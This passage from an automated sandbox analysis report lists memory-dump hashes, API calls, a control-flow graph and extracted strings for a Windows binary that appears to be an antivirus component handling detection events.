                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: EntryFunctionLookup
                          • String ID:
                          • API String ID: 3852435196-0
                          • Opcode ID: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
                          • Instruction ID: 0a16dca171e58903ec1b218c91cdb1b04bf095347935d32e98aab42d926b4c07
                          • Opcode Fuzzy Hash: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
                          • Instruction Fuzzy Hash: 7A316D33700A5482DB15CF16F484BA9B724F788BE8F868102EF2D47B99EB35D592C704
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID: 0-3916222277
                          • Opcode ID: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
                          • Instruction ID: 9b910ad21b0c4e6c2a4c619a0863cbecb71c4e07d0bd79d978466706db7fd7a1
                          • Opcode Fuzzy Hash: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
                          • Instruction Fuzzy Hash: 2FD1DEF25087C486F7A2DE16B5083AABAA0F7593E4F240115FF9527AF5E779C884CB40
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: InfoLocale
                          • String ID:
                          • API String ID: 2299586839-0
                          • Opcode ID: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
                          • Instruction ID: a72933d7652eee1ce42449f64e4370b365fbcbea739f10b8ca5cd41f8ceea018
                          • Opcode Fuzzy Hash: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
                          • Instruction Fuzzy Hash: EDF0FEF261468085EA62EB22B4123DA6750A79D7A8F800216FB9D476BADE3DC2558A00
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID:
                          • String ID: -
                          • API String ID: 0-2547889144
                          • Opcode ID: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
                          • Instruction ID: 5aef184856849f1d0e814b0a8e39d0e8e949ccad25035a2bf8530ae42cfb47ec
                          • Opcode Fuzzy Hash: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
                          • Instruction Fuzzy Hash: 5CB1CFF36086C482F7A6CE16B6083AABAA5F7597D4F240115FF4973AF4D779C8808B00
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID:
                          • String ID: -
                          • API String ID: 0-2547889144
                          • Opcode ID: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
                          • Instruction ID: 5cc8c865c9461daf8b0756d8ed2731e20d175c685145385c3f78aef56f479fea
                          • Opcode Fuzzy Hash: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
                          • Instruction Fuzzy Hash: 5FB1A0F26087C486F772CF16B5043AABAA1F7997D4F240115FF5923AE4DBB9C9848B40
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled
                          • String ID:
                          • API String ID: 3192549508-0
                          • Opcode ID: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
                          • Instruction ID: 6026514bbd401dabfdc0327cb8eb2cc9cc42ab70edfd582905dc0376ef34508b
                          • Opcode Fuzzy Hash: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
                          • Instruction Fuzzy Hash: 37B09260A61400D1D605AF22AC8538022A0775C340FC00410E20986130DA3C819A8700
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID:
                          • String ID: -
                          • API String ID: 0-2547889144
                          • Opcode ID: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
                          • Instruction ID: f0a9775499ae8e11c0cd3741dc570bab2f5201344a81d2c1a5008a9dc88a1dca
                          • Opcode Fuzzy Hash: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
                          • Instruction Fuzzy Hash: 7E91D4F2A047C485FBB2CE16B6083AA7AE0B7597E4F141516FF49236F4DB79C9448B40
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID:
                          • String ID: -
                          • API String ID: 0-2547889144
                          • Opcode ID: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
                          • Instruction ID: 8f8310eeb878d4aa74977829efb49c2c7de80d27e4d4fb150cd5d5e4432a17d7
                          • Opcode Fuzzy Hash: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
                          • Instruction Fuzzy Hash: 51818FB26087C485F7B2CE16B5083AA7AA0F7997D8F141116FF45636F4DB79C984CB40
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID:
                          • String ID: -
                          • API String ID: 0-2547889144
                          • Opcode ID: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
                          • Instruction ID: f8efd74c2ac63e8556513dce229926bc74ff59f5ae5890729ffd39c1599aad0a
                          • Opcode Fuzzy Hash: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
                          • Instruction Fuzzy Hash: BE81B0F2608BC486F7A2CE16B5083AA7AA1F7587E4F140515FF59236F4DB79C984CB40
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
                          • Instruction ID: 63b5043dbdffafa71f1ddaca105bc0afa02b2cba45448f866c4c658d1faf9303
                          • Opcode Fuzzy Hash: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
                          • Instruction Fuzzy Hash: B031B0B262129045F317AF37F941FAE7652AB897E0F514626FF29477E2CA3C88028704
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
                          • Instruction ID: b610fbdfd0d7c5655a75ac718b847164fa7f0802b4cc155a4829149d785d36e6
                          • Opcode Fuzzy Hash: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
                          • Instruction Fuzzy Hash: FE317EB262129445F717AF37B942BAE7652AB887F0F519716BF39077E2CA7C88018710
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
                          • Instruction ID: e0c281a5a51834f3cf9ef76d9d4ef001c4a7356b2a993cafd714ca14a0116626
                          • Opcode Fuzzy Hash: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
                          • Instruction Fuzzy Hash: F831E472A1029056F31BAF77F881BDEB652A7C87E0F655629BB190B7E3CA3D84008700
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266264014.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                          • Associated: 0000000C.00000002.2266247516.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266285614.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266327700.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266343032.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_7ffb23b00000_vtxXmC.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
                          • Instruction ID: 670e97a142c2f09490d67568de8b43bbf816610a3980219fbe0e7b0476ffcd07
                          • Opcode Fuzzy Hash: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
                          • Instruction Fuzzy Hash: 28F062B9B192958AEBA58F38E846B2D77D0E748380F988079D6CD83B14D67C90608F04

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 346 1400038d0-140003915 SetWaitableTimer 347 140003925-140003947 346->347 348 140003917-140003924 346->348 349 140003949-140003969 #4 347->349 350 140003970-14000397a 347->350 349->350 351 140003992-1400039d3 EnterCriticalSection LeaveCriticalSection WaitForMultipleObjects 350->351 352 14000397c-14000398d #4 350->352 353 140003d32 351->353 354 1400039d9-1400039f1 351->354 352->351 357 140003d35-140003d49 353->357 355 1400039f3-140003a04 #4 354->355 356 140003a09-140003a1a EnterCriticalSection 354->356 355->356 358 140003a67 356->358 359 140003a1c-140003a34 356->359 362 140003a6c-140003a8e LeaveCriticalSection 358->362 360 140003a36 359->360 361 140003a3e-140003a49 359->361 360->361 361->362 363 140003a4b-140003a65 SetEvent ResetEvent 361->363 364 140003ab4-140003abe 362->364 365 140003a90-140003aad #4 362->365 363->362 366 140003ae8-140003af9 364->366 367 140003ac0-140003ae1 #4 364->367 365->364 368 140003afb-140003b26 #4 366->368 369 140003b2d-140003b37 366->369 367->366 368->369 370 140003b61-140003b6b 369->370 371 140003b39-140003b5a #4 369->371 372 140003b6d-140003b98 #4 370->372 373 140003b9f-140003ba9 370->373 371->370 372->373 374 140003bab-140003bd6 #4 373->374 375 140003bdd-140003be7 373->375 374->375 376 140003be9-140003c14 #4 375->376 377 140003c1b-140003c25 375->377 376->377 378 140003c27-140003c48 #4 377->378 379 140003c4f-140003c59 377->379 378->379 380 140003c83-140003c8d 379->380 381 140003c5b-140003c7c #4 379->381 382 140003cb7-140003cc1 380->382 383 140003c8f-140003cb0 #4 380->383 381->380 384 140003cc3-140003ce4 #4 382->384 385 140003ceb-140003cf5 382->385 383->382 384->385 386 140003d11-140003d14 385->386 387 140003cf7-140003d0c #4 385->387 388 140003d17 call 140001750 386->388 387->386 389 140003d1c-140003d1f 388->389 390 140003d21-140003d29 call 140002650 389->390 391 140003d2e-140003d30 389->391 390->391 391->357
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: CriticalSection$EnterEventLeave$MultipleObjectsResetTimerWaitWaitable
                          • String ID: amps_Listen: pHandle=%paction taken: %d$amps_Listen: pHandle=%pdetection accuracy: %d$amps_Listen: pHandle=%pdetection component type: %d$amps_Listen: pHandle=%pdetection message: %s$amps_Listen: pHandle=%pdetection name: %s$amps_Listen: pHandle=%pdetection type: %d$amps_Listen: pHandle=%peventId: %d$amps_Listen: pHandle=%pobject archive name: %s$amps_Listen: pHandle=%pobject name: %s$amps_Listen: pHandle=%pobject type: %d$amps_Listen: pHandle=%psession Id: %d$amps_Listen: pHandle=%p, message is:$amps_Listen: pHandle=%p, message received, pulling from AMP queue$amps_Listen: pHandle=%p, p=%p$amps_Listen: pHandle=%p, waiting for messages from the AMP queue$null
                          • API String ID: 1021822269-3147033232
                          • Opcode ID: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                          • Instruction ID: ec7db78c4d4a766f71db07ed68f83fdabe3b60d74f96cc88383eff92a0be527c
                          • Opcode Fuzzy Hash: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                          • Instruction Fuzzy Hash: E5D1DAB5205A4592EB12CF17E880BD923A4F78CBE4F454122BB0D4BBB5DF7AD686C350

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: AddressProc$Library$Free$CriticalInitializeLoadSection
                          • String ID: MsiLocateComponentW$msi.dll$vseExec$vseGet$vseGlobalInit$vseGlobalRelease$vseInit$vseRelease$vseSet${7A7E8119-620E-4CEF-BD5F-F748D7B059DA}
                          • API String ID: 883923345-381368982
                          • Opcode ID: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                          • Instruction ID: d19804ac2d128cc8e67db72781ea5cb7b7d89be94dae840b99a82102003c66a5
                          • Opcode Fuzzy Hash: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                          • Instruction Fuzzy Hash: F351EEB4221B4191EB52CF26F8987D823A0BB8D7C5F841515EA5E8B3B0EF7AC548C700
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: Heap$CriticalSection$FreeProcess$EnterEventLeave$CloseHandle$MultipleObjectsResetWait
                          • String ID:
                          • API String ID: 1613947383-0
                          • Opcode ID: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                          • Instruction ID: 4415f923c5b49a541c3c18af517eb333de188a5b32bf04682df7988820a44021
                          • Opcode Fuzzy Hash: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                          • Instruction Fuzzy Hash: 8D51D3BA204A4496E726DF23F85439A6361F79CBD1F044125EB9A07AB4DF39D599C300
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                          • String ID:
                          • API String ID: 1995290849-0
                          • Opcode ID: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                          • Instruction ID: 07b3271e3c5f19e1ab061b13c36c38fadfaaa54878a955e19646b3fb384661b9
                          • Opcode Fuzzy Hash: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                          • Instruction Fuzzy Hash: 7C31D3B6601B41A7EB16DF63F98439833A4FB9CB81F484014EB4A07A35DF39E4B98304
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                          • String ID:
                          • API String ID: 1995290849-0
                          • Opcode ID: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                          • Instruction ID: fd5ea752b6625aace240e5dc115a6ac8a79eac1ae5096a798ed6b9a4de507a32
                          • Opcode Fuzzy Hash: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                          • Instruction Fuzzy Hash: B2311BB4511E0985EB07DF63FC943D423A6BB5CBD5F8D0129AB4A8B270EF3A8499C214
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: CriticalSection$EnterLeave$CloseCreateValue
                          • String ID: ?$SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                          • API String ID: 93015348-1041928032
                          • Opcode ID: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                          • Instruction ID: 955b1bef443a43e40f7389cebc0d05d3cfed999bfec6c75915e9fb821c1678e4
                          • Opcode Fuzzy Hash: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                          • Instruction Fuzzy Hash: E3714676211A4082E762CB26F8507DA73A5F78D7E4F141226FB6A4B7F4DB3AC485C700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: CriticalSection$AddressProc$EnterLeave$LibraryLoad
                          • String ID: vseqrt.dll$vseqrtAdd$vseqrtInit$vseqrtRelease
                          • API String ID: 3682727354-300733478
                          • Opcode ID: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                          • Instruction ID: 5756194132ff8dd7ec1522ad033bffa79c37130547d86cec9d6c1639cfe77c95
                          • Opcode Fuzzy Hash: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                          • Instruction Fuzzy Hash: 8C710175220B4186EB52DF26F894BC533A4F78CBE4F441226EA598B3B4DF3AC945C740
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: Heap$CriticalSection$AllocLeaveProcess$EnterTimerWaitable
                          • String ID: amps_Init: done, pHandle=%p$amps_Init: iFlags=%d, pid=%d, sid=%d
                          • API String ID: 2587151837-1427723692
                          • Opcode ID: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                          • Instruction ID: a7c4065e0455d4df5ce4727384a6dec66c16779501c9bb3b2af2b379a082be6c
                          • Opcode Fuzzy Hash: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                          • Instruction Fuzzy Hash: 9F5114B5225B4082FB13CB27F8847D963A5F78CBD0F445525BB4A4B7B8DB7AC4448700
                          APIs
                          Strings
